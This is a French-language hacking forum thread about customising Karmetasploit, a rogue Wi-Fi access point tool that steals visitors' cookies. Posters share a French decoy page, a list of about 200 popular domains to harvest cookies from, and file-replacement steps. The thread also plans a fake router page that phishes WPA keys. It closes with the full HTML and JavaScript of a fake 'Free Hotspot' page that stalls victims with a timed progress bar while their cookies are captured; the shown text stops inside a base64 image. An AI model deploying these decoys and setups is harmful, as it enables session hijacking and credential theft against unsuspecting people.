Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 06-10-2008 19:36:42

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Oui c'est nickel... Mais il y a du .gif là dedans, tu as réussi à le faire afficher par karmetasploit?

Sinon, bien évidemment comme tu le dis l'idéal serait d'afficher une page d'erreur perso en fonction du navigateur utilisé, ce qui permettrait d'etre totalement efficace. Le hic c'est que je ne sais pas comment modifier karmetasploit pour qu'il aille charger une page php, j'ai déja essayé de modifier le httpd.conf de l'apache inclu dans backtrack mais ça ne change rien au niveau de karmetasploit.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 06-10-2008 21:14:38

Fireman
Membre Hyperactif
Lieu : Lyon
Inscription : 28-07-2008
Messages : 52

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Si tu arrives a bidouiller la config d'apache et à faire en sorte qu'il puisse utiliser ces .php, je veux bien m'occuper de réaliser ce dernier wink

Hors Ligne

#28 06-10-2008 21:24:07

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

En fait le souci c'est que karmetasploit n'a pas l'air d'utiliser le serveur apache intégré à BT3... J'ai déja modifié le .conf, et en me connectant sur le serveur en local (127.0.0.1) j'arrivais bien à afficher ma page d'erreur "fake", mais sous karmetasploit le chargement de l'image semble poser un problème.

Hors Ligne

#29 06-10-2008 21:34:19

Fireman
Membre Hyperactif
Lieu : Lyon
Inscription : 28-07-2008
Messages : 52

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

On a qu'a faire en sorte de réduire au maximum les images et de faire sortir un max de html wink
Ca évitera les soucis.

Hors Ligne

#30 06-10-2008 22:17:17

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

C'est ce que je m'étais dit, mais ce n'est pas évident d'avoir le meme rendu avec juste du html.

Hors Ligne

#31 02-11-2008 14:48:47

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bon, voila quelques news pour les utilisateurs francophones de Karmetasploit:

Je vous ai préparé 2 petits trucs bien sympathiques... Pour commencer, une page index.html en français pour remplacer celle d'origine en anglais, affichant "Connexion en cours..." comme ceci:

karmetasploit-index-french.png
Image taille réelle ici.

Le titre de la page est "connexion en cours", c'est tout simplement la page d'origine de karmetasploit avec un code html modifié. Un utilisateur lambda tombant sur cette page ne se posera pas trop de question et patientera bien sagement, mais vous, en tant qu'utilisateur averti, vous savez ce que ce type de page signifie...

Voici la page en question: page d'index karmetasploit en français. Pour l'utiliser, rendez vous dans /msf3/data/exploits/capture/http/ et remplacez l'index.html d'origine par cette page.

Ensuite, je vous ai préparé un fichier contenant la liste des 100 topsites français (source du classement: Alexa) afin de rendre Karmetasploit plus efficace. Ces sites sont les 100 sites les plus fréquentés depuis la France:

google.fr
live.com
skyrock.com
youtube.com
facebook.com
yahoo.com
msn.com
orange.fr
google.com
free.fr
dailymotion.com
ebay.fr
wikipedia.org
leboncoin.fr
linternaute.com
vmn.net
aol.fr
prizee.com
pagesjaunes.fr
commentcamarche.net
myspace.com
over-blog.com
voila.fr
microsoft.com
priceminister.com
skyblog.com
jeuxvideo.com
vente-privee.com
msn.fr
allocine.fr
blogger.com
doctissimo.fr
01net.com
cdiscount.com
adultfriendfinder.com
lequipe.fr
laredoute.fr
meeticaffinity.fr
lo.st
eorezo.com
youporn.com
neuf.fr
aliceadsl.fr
aufeminin.com
megavideo.com
meetic.fr
vivastreet.fr
deezer.com
zylom.com
voyages-sncf.com
anpe.fr
bouyguestelecom.fr
aol.com
voyance-web.fr
programme-tv.net
googlesyndication.com
amazon.fr
netlog.com
tf1.fr
ovh.net
canalblog.com
labrute.fr
boursorama.com
imageshack.us
partypoker.com
club-internet.fr
pornhub.com
laposte.net
quelle.fr
neufportail.fr
ask.com
sfr.fr
bouyguestelecom.com
clubic.com
fnac.com
lemonde.fr
redtube.com
mininova.org
bigpoint.com
pagesperso-orange.fr
caisse-epargne.fr
3suisses.fr
mappy.com
meteofrance.com
ma-bimbo.com
reverso.net
lycos.fr
pixmania.com
wat.tv
jeux.fr
mobilotop.com
hi5.com
eurosport.fr
kijiji.fr
rueducommerce.fr
centerblog.net
pmu.fr
onlinecashmethod.com
fdjeux.com
rapidshare.com

Le fichier contient tous ces noms de domaines, et les memes avec www. devant, ce qui fait une liste de 200 noms de domaine. Voici le fichier: liste des 100 topsites français.

Pour que karmetasploit prenne en compte ces sites et essaie de récupérer les cookies correspondant à tous ces noms de domaine, vous devez vous rendre dans /msf3/data/exploits/capture/http/ et modifier le fichier sites.txt. Vous pouvez y ajouter les sites de votre choix, ou bien le remplacer par le fichier sites.txt que je vous ai préparé, et qui contient les 100 topsites français et en plus:

adwords.google.com
blogger.com
care.com
careerbuilder.com
ecademy.com
facebook.com
gather.com
gmail.com
gmail.google.com
google.com
linkedin.com
livejournal.com
monster.com
myspace.com
plaxo.com
ryze.com
slashdot.org
twitter.com
www.blogger.com
www.care2.com
www.careerbuilder.com
www.ecademy.com
www.facebook.com
www.gather.com
www.gmail.com
www.google.com
www.linkedin.com
www.livejournal.com
www.monster.com
www.myspace.com
www.plaxo.com
www.ryze.com
www.slashdot.org
www.twitter.com
www.xing.com
www.yahoo.com
www.ziggs.com
xing.com
yahoo.com
ziggs.com

Avec l'index modifié et un fichier sites.txt spécialement adapté, vous avez de quoi vous amuser avec Karmetasploit big_smile

Hors Ligne

#32 15-11-2008 16:20:44

ste45
Membre
Inscription : 15-11-2008
Messages : 13

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Impressionnant,

Chez moi Firefox est reglé de facon à ce que tous les cookies soient supprimés à la fermeture.
Les mots de passe sont enregistrés dans le gestionnaire de mots de passe.
Suis-je protégé contre ce genre d'attaques ?

Hors Ligne

#33 15-11-2008 17:38:18

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Voilà encore du bon boulot M1ck3y!     cool

euhhhhh....crack-wpa est pas encore dans le top 100??  tongue
Ca doit être une faute d' erreur probablement!   lol


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#34 15-11-2008 21:33:00

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

ste45 a écrit :

Chez moi Firefox est reglé de facon à ce que tous les cookies soient supprimés à la fermeture.
Les mots de passe sont enregistrés dans le gestionnaire de mots de passe.
Suis-je protégé contre ce genre d'attaques ?

Tu veux dire que lorsque tu ouvres ton navigateur, tu dois à chaque fois te re-logger sur les sites qui nécessitent une identification (comme le forum par exemple)? Alors si c'est le cas ton navigateur n'aura pas de cookies pour nourrir karmetasploit, et tu es en effet protégé contre ce type d'attaque. Cela dit c'est tout de meme un peu contraignant de devoir se re-logger à chaque fois que tu vas sur un site ou un forum...

Grand Hibou a écrit :

crack-wpa est pas encore dans le top 100??

lol Non, on dirait que l'internaute lambda préfère la messagerie instantanée, les blogs, les réseaux sociaux (qu'est ce que ça me gonfle ces trucs là!), les sites de rencontre et les sites X...

En fait, crack-wifi.com était number one du classement, j'en veux pour preuve cette capture:

crack-wpa-number-one.png
Image taille réelle ici.

Mais un complot mélant Nicolas Sarkozy, le F.B.I. et les chinois a supprimé le site du top 100... lol

Hors Ligne

#35 16-11-2008 20:32:23

ste45
Membre
Inscription : 15-11-2008
Messages : 13

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Non, je ne retape pas mes identifiants à chaque fois, ils sont rentrés automatiquement par le gestionnaire de mots de passe de Firefox. Par contre cela nécessite de cliquer sur "s'identifier" puis "ok".

Hors Ligne

#36 16-11-2008 21:00:49

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

D'accord, alors dans ce cas là probablement qu'en cas d'attaque karmetasploit les cookies ne pourront pas etre récupérés automatiquement, à moins que tu valides les multiples demandes d'authentification. Il faudrait que tu fasses le test pour voir ce que cela donne.

Hors Ligne

#37 19-11-2008 18:38:58

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Wahou, je suis triste de ne pas avoir lu cette discussion plus tôt, car ce script a vraiment l'air très intéressant big_smile


Pour revenir au problème des images, je ne sais pas si vous connaissez l'astuce qui consiste à mettre le source des images dans la page (donc pas d'appel d'image externe).

Pour faire ceci, il faut encoder l'image en Base64 et mettre le code HTML adéquat.
Un exemple :
Pour insérer cette image dans une page : i810_basecrackwpa.gif
on peut écrire :

<img src="http://images.filzup.com/out.php/i810_basecrackwpa.gif"
alt="Base64 encoded image" width="150" height="150"/>

Ou

<img src="data:image/gif;base64,R0lGODlhDwAPAKECAAAAzMzM/////
wAAACwAAAAADwAPAAACIISPeQHsrZ5ModrLlN48CXF8m2iQ3YmmKqVlRtW4ML
wWACH+H09wdGltaXplZCBieSBVbGVhZCBTbWFydFNhdmVyIQAAOw=="
alt="Base64 encoded image" width="150" height="150"/>

Et heureusement, il y a plusieurs services sur le web pour encoder vos images smile :
- http://www.greywyvern.com/code/php/binary2base64
- http://www.motobit.com/util/base64-decoder-encoder.asp
- http://dean.edwards.name/weblog/2005/06/base64-ie/
- http://www.elf.org/essay/inline-image.html

À part ça, je me disais qu'une belle page avec du reverse engineering pourrait être sympa D:
Un exemple :

L'utilisateur lambda se connecte sur le hotstop, et ouvre google.fr.

Il tombe sur une page style

"Free Hotstop est heureux de vous accueillir sur ses hotspots pour la première fois. Veuillez appuyer sur le bouton connexion pour activer votre service internet."

On lui met un joli bouton [Connexion] (une image en base64 ? big_smile), et quand il va appuyer dessus ça va déclencher une petite fonction javascript qui va lui afficher une barre de progression (qui sera en réalité timée) avec les messages inutiles du style
* "Négociation avec le F.A.I."
* "Négociation avec le nouveau service Windows®™© Premium™ Antivirus® Spyware©"
* "Acceptation du certificat de DHCP".

En réalité ces messages seront timés, et la barre de progression n'arrivera à 100% que après 5min. (le temps qui les cookies reviennent à papa hax0r big_smile )

Et à ce moment là, le bonhomme verra un joli bouton "Activer", et quand il cliquera dessus, ça lui fera un beau message

Microsoft Server Errer 500. Veuillez contacter votre administrateur réseau, et lui indiquer l'erreur suivante:
Error XVL693EK.

[small](qui n'a jamais vécu ça ? big_smile )[/small]

Ça doit être facilement faisable avec un peu de Javascript, mais je pense qu'on peut quand même améliorer cette idée smile


Cordialement


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#38 19-11-2008 19:18:06

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bien vu le coup du base 64 pour insérer l'image wink Je testerais ça la prochaine fois que j'aurais l'occasion d'utiliser karmetasploit big_smile

Sinon, niveau discussion très intéressante et belles attaques basées sur de la rogue ap, je t'invite à lire ce topic sur le forum remote-exploit: Bruteforce attack useless. Au départ, c'est parti d'un échange d'idée entre woistfred et moi meme, maintenant il y a 7 pages de projets d'attaque rogue ap + metasploit, le but est de créer une rogue ap qui va etre à meme de récupérer la clé WPA en "metasploitant" le client... woistfred travaille sur un meterpreter script for the "quick'n'dirty WPA job", bon ok il y a 7 pages de discussions mais tu vas voir c'est passionnant, il y a du travail de développement, de codage et de tests mais ça risque de nous donner un bel outil tout ça, si ça t'inspire n'hésite pas à nous dire ce que tu en penses big_smile

PS: J'adore ton petit scénario... "Négociation avec le nouveau service Windows®™© Premium™ Antivirus® Spyware©" pendant que karmetasploit pompe les cookies lol , et "Microsoft Server Errer 500. Veuillez contacter votre administrateur réseau, et lui indiquer l'erreur suivante: Error XVL693EK." pour couronner le tout smile Tu verras dans la discussion sur remote-exploit l'idée que j'ai eue permettrait aussi de développer un joli petit scénario d'attaque mélant la rogue ap et le social engineering en faisant appel au coté "benet" qui sommeille en chaque utilisateur... J'imagine déja le truc: "Mise à jour réussie. Vous utilisez maintenant le firmware version 5.7.9 avec les derniers correctifs de sécurité. Votre réseau est reconnu comme inviolable par

A-Squared
AntiVir 
ArcaVir 
Avast 
AVG Antivirus 
BitDefender 
ClamAV 
CPsecure 
Dr.Web 
F-Prot Antivirus
F-Secure Anti-Virus   
G DATA 
Ikarus
Kaspersky Anti-Virus
NOD32 
Norman Virus Control 
Panda Antivirus 
Sophos Antivirus 
VirusBuster 
VBA32

Veuillez valider votre clé WPA afin de vous authentifier sur le réseau."

lol

Hors Ligne

#39 19-11-2008 20:07:57

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

M1ck3y a écrit :

Sinon, niveau discussion très intéressante et belles attaques basées sur de la rogue ap, je t'invite à lire ce topic sur le forum remote-exploit: Bruteforce attack useless. Au départ, c'est parti d'un échange d'idée entre woistfred et moi meme, maintenant il y a 7 pages de projets d'attaque rogue ap + metasploit, le but est de créer une rogue ap qui va etre à meme de récupérer la clé WPA en "metasploitant" le client... woistfred travaille sur un meterpreter script for the "quick'n'dirty WPA job", bon ok il y a 7 pages de discussions mais tu vas voir c'est passionnant, il y a du travail de développement, de codage et de tests mais ça risque de nous donner un bel outil tout ça, si ça t'inspire n'hésite pas à nous dire ce que tu en penses big_smile

Plus on lit de topics comme ça, plus on se dit qu'on n'est jamais en sécurité xD !

Metasploit, c'est bien, mais je trouve que pour une clé WPA on peut certainement faire plus simple ; je sais plus où j'avais lu que quand un utilisateur lambda voit une fenêtre avec écrit "Voulez-vous installer un spyware ?" il clique sur O.K. deux fois sur trois car il a l'habitude de répondre ok à toutes les questions de ce type... je me demandais si c'était vrai jusqu'au jour où quelqu'un de mon entourage a installé un spyware avec un dérivé de cette "technique" lol. Ça fait peur quand même yikes


M1ck3y a écrit :

PS: J'adore ton petit scénario... "Négociation avec le nouveau service Windows®™© Premium™ Antivirus® Spyware©" pendant que karmetasploit pompe les cookies lol , et "Microsoft Server Errer 500. Veuillez contacter votre administrateur réseau, et lui indiquer l'erreur suivante: Error XVL693EK." pour couronner le tout smile Tu verras dans la discussion sur remote-exploit l'idée que j'ai eue permettrait aussi de développer un joli petit scénario d'attaque mélant la rogue ap et le social engineering en faisant appel au coté "benet" qui sommeille en chaque utilisateur... J'imagine déja le truc: "Mise à jour réussie. Vous utilisez maintenant le firmware version 5.7.9 avec les derniers correctifs de sécurité. Votre réseau est reconnu comme inviolable par

A-Squared
AntiVir 
ArcaVir 
Avast 
AVG Antivirus 
BitDefender 
ClamAV 
CPsecure 
Dr.Web 
F-Prot Antivirus
F-Secure Anti-Virus   
G DATA 
Ikarus
Kaspersky Anti-Virus
NOD32 
Norman Virus Control 
Panda Antivirus 
Sophos Antivirus 
VirusBuster 
VBA32

Veuillez valider votre clé WPA afin de vous authentifier sur le réseau."

lol

Quelle superbe idée ! De plus (même à moi) ça m'est arrivé d'avoir la box qui me sort "Mise à jour du firmware ~~" (étant parano, je me suis connecté en ethernet à ce moment là, et c'était bien vrai x) ).

Comme quoi, le futur du crack wpa, c'est les noobs big_smile


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#40 19-11-2008 20:22:56

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

En fait, avec les outils disponibles à l'heure actuelle, une attaque rogue ap ramenant le client vers une page "fake" ressemblant à l'interface d'administration du routeur et demandant de rentrer la clé WPA manuellement donnera surement de meilleurs résultats qu'une attaque dictionnaire contre un handshake, et en plus ça sera relativement rapide. L'intéret du script permettant de récupérer la clé WPA directement dans le registre via le meterpreter metasploit, c'est dans le cas ou l'utilisateur est relativement malin et n'a pas "mordu" à l'attaque par page fake, ou alors si la station est connectée mais qu'il n'y a personne derrière l'ordi (cas typique: le client bittorrent qui tourne 24 heures sur 24 en seed).

Comme tu t'en rend compte, le crack WPA est sur le point de se développer et d'évoluer avec de nouvelles attaques qui pourraient etre redoutablement efficaces, il nous reste à coder, tester et fignoler tout ça mais le résultat devrait etre très sympathique wink

Hors Ligne

#41 20-11-2008 22:39:51

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bonjour !

J'ai fait cette page dont je parlais, voici ses caractéristiques :
* Attente personnalisée
* Utilisation d'images base64 (ou de texte pour I.E.)
* Possibilité d'utiliser des cookies pour piéger le visiteur

Voilà les fichiers :
Version compressée de la page.
Version compressée de la page accélérée (barre de chargement plus rapide).
Page non compressée.
-> Je vous conseille de commencer par la version rapide car vous n'êtes pas sur une rogue ap avec Karmatsploit, donc pas besoin d'attendre que papa vole les cookies big_smile

Code source de la page avec les commentaires :

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

	<style>
body
{
   width: 760px;
   margin: auto;
}

#top {
background:#FFFFFF url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAQAAABwCAMAAAAOnCGbAAAAe1BMVEX////+/v79/f38/Pzz8vL19PT7+/v08/P6+vr29fX5+Pj49/f39vb6+fn5+fnp5+f+/f3t6+vq6Ojt7Ozu7e3w7+/19fXo5+f09PTo5ubq6ens6urr6urv7u7n5eX39/fy8fH4+Pjx8PD7+vrm5OT9/Pzl4+P8+/v29vZRaDwJAAAAcklEQVR42pXE2Q7BYBSF0U1RMzXP1Pz+T+iLfdOc/NJYF0uq18B/TaEmanrAZfjdC66DZDe4LmIjVBqjUh+xEm6A2BluiNgbrofYCmoj2QbKkayFZBe4K9wSOkILaA4V0B46QDtoBk2gNbSFTtAd7olvH23kF30435WPAAAAAElFTkSuQmCC) repeat-x scroll left top;
border-bottom:1px solid #8E8E8E;
height:112px;
width: 758px;
margin:0;
padding:0;
} 
#texto {
display: inline;
margin-left : 15px;
font-size : 20px;
height:112px;
color : gray;
}

#karmabody {
border-left:1px solid #8E8E8E;
border-right:1px solid #8E8E8E;
border-bottom:1px solid #8E8E8E;
}

#texte {
padding : 10px;
font-size : 15px;
}
#connec,#activer {
border:1px solid black;
background-color:#8F0909;
color:#FFFFFF;
padding:5px;
margin:5px;
text-decoration: none;

}

#activer {
margin-top:-25px;
height: 20px;
width:60px;
}

#iefuck {
display:none;}

#barre {
height: 25px;
width : 200px;
border:1px solid black;}

#inbarre {
height : 25px;
width : 2px;
background-color: red;
}

#bsodead {
background-color: blue;
color:white;
font-size:30px;
display:none;
}

#a { 
	background-color: lightgray;
	border: 1px solid black;
	width: 300px;
	}
#b { 
	background-color: black;
	height: 30px;
	}
#c { 
	color: white;
	text-align: center;
	padding-top: 5px; 
	}

#etat, #action {
display:inline;}
	</style>
<script type="text/javascript">
<!--
/* choisissez si vous voulez qu'un cookie soit enregistré chez le bonhomme. 0 = non | 1 = oui */
/* (désactivé par défaut) */
var tocook = 0;

     function setCook(nom,valeur,jours) {
        var expDate = new Date();
        expDate.setTime(expDate.getTime() + (jours * 24 * 3600 * 1000));
        document.cookie = nom + "=" + escape(valeur);
            + ";expires=" + expDate.toGMTString();
        }
   function lit_cook(moncook) {
      var deb,fin;
      deb = document.cookie.indexOf(moncook + "=");
      if (deb >= 0) {
         deb += moncook.length + 1;
         fin = document.cookie.indexOf(";",deb);
         if (fin < 0) fin = document.cookie.length;
         return unescape(document.cookie.substring(deb,fin));
         }
      return ""
      }

/*
SimpleJS ver 0.1 beta
En compressé, c'est un script qui permet d'avoir des effets sympathiques sans avoir à beaucoup coder et le code est très léger :)
SimpleJS is developed by Christophe "Dyo" Lefevre (http://bleebot.com/)
*/
function $(id){return document.getElementById(id)}function STO(_24,_25){return window.setTimeout(_24,_25)}function DecToHexa(_26){var _27=parseInt(_26).toString(16);if(_26<16){_27="0"+_27}return _27}function addslashes(str){str=str.replace(/\"/g,"\\\"");str=str.replace(/\'/g,"\\'");return str}function $toggle(id){if(act_height(id)==0){$blinddown(id)}else{$blindup(id)}}function act_height(id){height=$(id).clientHeight;if(height==0){height=$(id).offsetHeight}return height}function act_width(id){width=$(id).clientWidth;if(width==0){width=$(id).offsetWidth}return width}function max_height(id){var ids=$(id).style;ids.overflow="hidden";if(act_height(id)!=0){return act_height(id)}else{origdisp=ids.display;origheight=ids.height;origpos=ids.position;origvis=ids.visibility;ids.visibility="hidden";ids.height="";ids.display="block";ids.position="absolute";height=act_height(id);ids.display=origdisp;ids.height=origheight;ids.position=origpos;ids.visibility=origvis;return height}}function $blindup(id,_2f){if(!_2f){_2f=200}acth=act_height(id);maxh=max_height(id);if(acth==maxh){$(id).style.display="block";var _30;_30=Math.ceil(_2f/acth);for(i=0;i<=acth;i++){newh=acth-i;STO("$('"+id+"').style.height='"+newh+"px'",_30*i)}}}function $blinddown(id,_32){if(!_32){_32=200}acth=act_height(id);if(acth==0){maxh=max_height(id);$(id).style.display="block";$(id).style.height="0px";var _33;_33=Math.ceil(_32/maxh);for(i=1;i<=maxh;i++){STO("$('"+id+"').style.height='"+i+"px'",_33*i)}}}function $opacity(id,_35,_36,_37){if($(id).style.width==0){$(id).style.width=act_width(id)}var _38=Math.round(_37/100);var _39=0;if(_35>_36){for(i=_35;i>=_36;i--){STO("changeOpac("+i+",'"+id+"')",(_39*_38));_39++}}else{if(_35<_36){for(i=_35;i<=_36;i++){STO("changeOpac("+i+",'"+id+"')",(_39*_38));_39++}}}}function $pulsate(id,num,speed){if(!speed)speed=300;for(i=1;i<=num;i++){numx=i*((speed*2)+100)-(speed*2);STO("$opacity('"+id+"', 100, 0, "+speed+")",numx);STO("$opacity('"+id+"', 0, 100, "+speed+")",numx+speed+100)}}function changeOpac(_3a,id){var ids=$(id).style;ids.opacity=(_3a/100);ids.MozOpacity=(_3a/100);ids.KhtmlOpacity=(_3a/100);ids.filter="alpha(opacity="+_3a+")"}function $shiftOpacity(id,_3e){if($(id).style.opacity<0.5){$opacity(id,0,100,_3e)}else{$opacity(id,100,0,_3e)}}function currentOpac(id,_40,_41){var _42=100;if($(id).style.opacity<100){_42=$(id).style.opacity*100}$opacity(id,_42,_40,_41)}function $highlight(id,_44,_45,_46){if(_44){milli=_44}else{milli=900}if(_45){endcol=_45}else{endcol="#FFFFFF"}if(_46){origcol=_46}else{origcol="#FFFFA6"}$colorize(origcol,endcol,id,milli,"high")}function $textColor(id,_48,_49,_4a){if(_4a){milli=_4a}else{milli=900}$colorize(_48,_49,id,milli,"text")}function $morphColor(id,_4c,_4d,_4e,_4f,_50,_51,_52){if(_52){milli=_52}else{milli=900}$colorize(_4c,_4d,id,milli,"text");$colorize(_4e,_4f,id,milli,"back");if(_50!=false){$colorize(_50,_51,id,milli,"border")}}function $colorize(_53,end,id,_56,_57){dr=parseInt(_53.substring(1,3),16);dg=parseInt(_53.substring(3,5),16);db=parseInt(_53.substring(5,7),16);fr=parseInt(end.substring(1,3),16);fg=parseInt(end.substring(3,5),16);fb=parseInt(end.substring(5,7),16);steps=_56/10;cr=dr;cg=dg;cb=db;sr=(fr-dr)/steps;sg=(fg-dg)/steps;sb=(fb-db)/steps;var zzi=10;for(var x=0;x<steps;x++){color="#"+DecToHexa(cr)+DecToHexa(cg)+DecToHexa(cb);if(x==(steps-1)){if(_57=="high"){color=""}else{color=end}}mytime=(x);if(_57=="back"||_57=="high"){newfonc="$(\""+id+"\").style.backgroundColor=\""+color+"\";"}else{if(_57=="text"){newfonc="$(\""+id+"\").style.color=\""+color+"\";"}else{if(_57=="border"){newfonc="$(\""+id+"\").style.borderColor=\""+color+"\";"}}}STO(newfonc,zzi);cr+=sr;cg+=sg;cb+=sb;zzi+=10}}

function connec() 
{
$toggle("un");
setTimeout("$toggle('deux')", 500); 
document.getElementById("c").innerHTML="";	
setTimeout("timedProg()", 1000); 
}

var i = 0;
/* Barre de progression ;
j'avais la flemme d'en faire une, j'ai pris celle de http://home.hetnet.nl/~hans-kuipers5/js/progressbar.htm et je l'ai modifiée */


function timedProg() {
    var j=0;	
  if (i <= 300) {
    if (i > 40 && i < 300) {
			document.getElementById("c").innerHTML=parseInt(i/3)+"%";
			document.getElementById("etat").innerHTML=parseInt(i/3)+"%";
			}
  
document.getElementById("b").style.width=i+"px";
	
    while (j<=100)
     	j++;  
    setTimeout("timedProg();", 2000);

    i++;   

if (i==300) {
$("etat").innerHTML='Connexion Réussie ! <br /> Veuillez appuyer sur le bouton "Activer" pour que votre connexion soit activée';
$("useless").style.display ="none";
$("a").style.display ="none";
$("b").style.display ="none";
$("c").style.display ="none";
$("activer").style.display ="block";
}  
else if (i/3 > 50 && i/3 < 60) {
$("action").innerHTML="Négociation avec le F.A.I."; 
}
else if (i/3 > 60 && i/3 < 70) {
$("action").innerHTML="Échange des certificats NetDNS.";
} 
else if (i/3 > 70 && i/3 < 80) {
$("action").innerHTML="Préparation aux échanges de paquets Windows Antispyware.";
} 
else if (i/3 > 80 && i/3 < 90) {
$("action").innerHTML="Ajout de ce Hotspot au centre Free.";
} 
else if (i/3 > 90 && i/3 < 100) {
$("action").innerHTML="Sécurisation de la connexion avec Windows Server.";
}     

	}  }

/* Fin du code pour la barre */


function bouh() 
{
alert("L'application WINSERVREV569.EXE a rencontré un problème et doit fermer. Veuillez contacter votre administrateur réseau, et lui indiquer l'erreur suivante : Error XVL693EK.");
}

function activ() 
{
$("karmabody").style.display ="none";
document.bgColor = "blue";
document.getElementById("bsodead").style.display ="block";
if (tocook==1){
if (lit_cook("bsod")==1){}
else {setCook("bsod", 1, 365); }}
bouh();
}


//-->
</script>
<!-- /* Et pour cet abruti de ie */ -->
<!--[if lt IE 7]><style>#top {padding-bottom: -5px;}#img1 {display:none;} #iefuck {display:inline;height:90px;font-size:112px;color:red;font-family: "Franklin Gothic Medium", sans-serif;font-style:italic;}#texto{text-align:right;}</style><![endif]-->

<title>Bienvenue sur les Hotspots Free.</title>
</head>

<body>
<!-- La page avant le BSOD -->
<div id="karmabody">

<!-- L'image de l'entete -->
<div id="top" ><img id ="img1" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAOgAAABwCAMAAAAjQsxkAAABgFBMVEX////+/v7hAQH9/f38/Pzz8vL08/P7+/v19PT6+vrt7e3w8PDm5eXs6+v19fX4+Pj09PT+/f3p5+ft6+vn5eXs6uro5ubq6Oj39/f29vb6+fno5+f5+fnq6ent7Ozv7u7u7e35+Pjw7+/49/f7+vr8+/v39vbm5OT9/Pz29fXy8fHx8PDZXFzLysrac3PXYmLbubni4eHXeXneFxfZjo7XUlLIoKDPbm7bgYHRtLTXnp7Zo6PZSkrZra3cbGzU0tLh0dHHrq7FtLTJpaXYPz/myMjfCwvVTU3b2trXQ0PKurrbQkLFvr7Qc3PTrKzYtLTViYnUpKTRu7vYwsLc29vUVVXcIyPKqanTXV3IyMjLsrLe3d3Qg4PbKyvWk5PfERHaysriqanUbGzRfHzh4ODaMjLdHR3ZOjrLkpLVmZnLmprk5OTTZWXMwsLj4uLm5uby8vLTxcXp6OjOzc3OeXnQ0NDf39/Uysrl4+PV1NTDwsLZ2NjgBgbr6urMiYnY1tZ993tHAAANlUlEQVR42u1a+1va2hLleg8phQS4b2nMw9hjr6G2jbbWatv04UFstdUaHxgfPRpAjSYQCvKK/Ot3NmASFCVt/e6nhfVTu1mSWXtmz56Z4PH00EMPPfTQw/XjL12CntCe0J7QntCe0J7QntCe0M5C/9Yl8Py1S9AT2hPaE9oT2hP6fxX63y5B9wj97dpwp4nfbiQ816Tx7t2BUKgfEBq4e/fOrykUVA6EIkEswwc4LsBjwf6BGyj1p4WCyv4gxjMEReKqpqk65eeDoZun1POzMkORMO+ncEGulMR8Pi+W4gIVCA78WkKRTIwjdCVeym6cHs2mt1KprZdjb8xM/90bJ/T3H8b9e4MjXoYqyrXs2vN0rM9C+g0zcu/3G4YfF3p/cBhjKE0qvdhLV/ta8Ij23Tyhd34MkILCAUKVxI3d1b7z2GbCA3duGDw/qjOS8ety6fj5RZl9Hx9wkV9E6N1QkCe0Sm5zqyFtZnd7amp7Ybb+349vCEhGv4RQ0BmgCqWN2cbZnFkSZUXTFFlafrU9+adM8JGBX0Lo3VCYI6X8fqrhzseiQhJ+hvHTpkGSBsFkIqEbp/OO5/53496Qj9Gl3EIz1a5UikQUGwH4MD4a5b2+4cF7928cvl/ovUEfp0uj683Ms7pcZDGQBhgcHEKAf9+/gULvficG4HySUu5MZ3VRITCo4n8eA4Drp1r4fqERnpJzz8+ukq0KiVJPW1sGXKzVV0Oow4sAUJsXulzEd1B/WuhAP0YL4umZzuqk4A+HzpsDxkQiQTDGtgQW6/ZF6g1rKzUYRi1eIMAFAnwGCwcj